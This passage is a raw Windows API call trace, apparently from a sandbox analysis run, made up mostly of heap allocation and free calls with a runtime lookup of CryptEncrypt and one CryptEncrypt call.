hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2d28 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.244] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.244] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0166.245] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.245] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.245] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.245] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.246] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0166.246] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.246] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0166.247] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0166.248] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0166.248] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.249] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.250] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0090 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0166.251] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa700, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.251] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0166.251] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.251] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a30 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a01a0 | out: hHeap=0x25c0000) returned 1 [0166.252] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0166.252] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34a00c0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x8 | out: pbData=0x34a00c0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0166.252] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.253] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0166.253] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0166.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0190 | out: hHeap=0x25c0000) returned 1 [0166.254] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0166.254] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.254] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0150 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0166.255] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0166.255] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 